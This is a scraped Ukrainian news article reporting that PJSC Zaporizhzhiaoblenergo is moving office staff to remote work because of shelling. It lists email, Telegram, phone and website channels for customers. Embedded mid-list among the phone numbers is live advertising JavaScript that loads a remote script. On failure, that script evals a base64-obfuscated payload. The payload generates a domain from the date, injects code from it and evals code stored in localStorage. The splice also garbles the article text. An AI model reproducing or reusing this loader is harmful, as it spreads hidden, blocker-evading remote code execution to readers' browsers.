Через збільшення кількості та частоти обстрілів цивільної інфраструктури м. Запоріжжя з боку окупаційних військ рф, ПАТ «Запоріжжяобленерго» переводить офісний персонал на дистанційний режим роботи.
Таке рішення ухвалено, аби не наражати працівників та клієнтів на небезпеку, адже напередодні опалювального сезону об’єкти електроенергетики – у тому числі й адміністративні будівлі енергокомпаній – стали однією з ключових мішеней ворога.
У зв’язку із цим з 6 жовтня тимчасово ПРИПИНЯЄТЬСЯ ПРИЙОМ СПОЖИВАЧІВ ЕЛЕКТРОЕНЕРГІЇ у центрах обслуговування, так само припиняється прийом звітів щодо обсягів спожитої електроенергії та іншої документації від юридичних споживачів «наживо».
На час дії дистанційного режиму роботи обслуговування споживачів здійснюватиметься за допомогою електронних сервісів:
• скарги, звернення, запити, тощо надсилайте на електронну скриньку інформаційно-консультаційного центру ПАТ «Запоріжжяобленерго» IKC@zoe.com.ua;
• Акти про спожиту електричну енергію за розрахунковий період юридичні споживачі можуть передати у сканованому вигляді або у формі фотокопії через систему обміну повідомленнями Telegram, https://t.me/Zoezvit, або на електронну адресу Zoezvit@zoe.com.ua/. Для швидкої та коректної обробки Актів прохання надавати скановані або фото копії з чітким зображенням, також обов’язково зазначати назву районного відділення (РЕМ), в якому знаходиться Договір;
• передати покази побутові споживачі можуть (протягом останніх двох днів поточного місяця плюс перших трьох наступного місяця):
телефоном, за допомогою голосового меню самообслуговування:+38 (098) 168-01-01; +38 (050) 119-91-69; +38 (093) 170-23-35; (061) 228-51-09 var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
через чат-бот OblenergoZpBot у системі обміну повідомленнями Telegram: @OblenergoZpBot
через сайт ПАТ «Запоріжжяобленерго»:
https://www.zoe.com.ua/pokazania.php. Також наразі опрацьовується питання переведення кол-центру ПАТ «Запоріжжяобленерго» на дистанційний режим прийому дзвінків від споживачів. Про завершення робіт буде повідомлено додатково.
«ЩЕ РАЗ ЗВЕРТАЄМО УВАГУ! Вже з 6 жовтня ЦЕНТРИ ОБСЛУГОВУВАННЯ КЛІЄНТІВ (АБОНЕНТСЬКІ СЛУЖБИ) та інші служби ПАТ «ЗАПОРІЖЖЯОБЛЕНЕРГО» (у тому числі й ЗАПОРІЗЬКИХ МІСЬКИХ ЕЛЕКТРОМЕРЕЖ, що є одним зі структурних підрозділів «Запоріжжяобленерго») працюватимуть дистанційно та НЕ ПРИЙМАТИМУТЬ ВІДВІДУВАЧІВ!!!З метою забезпечення безпеки споживачів електроенергії та працівників енергокомпанії все спілкування здійнюватиметься ВИКЛЮЧНО У ДИСТАНЦІЙНОМУ ФОРМАТІ!!!Про відновлення оф-лайн обслуговування буде повідомлено додатково.
Приносимо вибачення за вимушені незручності, але наразі вимоги безпеки є пріоритетними.
Бережіть себе», — йдеться у інформаційному повідомленні компанії. (adsbygoogle = window.adsbygoogle || []).push({});
Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/pat-zaporizhzhyaoblenergo-zminyuye-rezhim-roboti/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook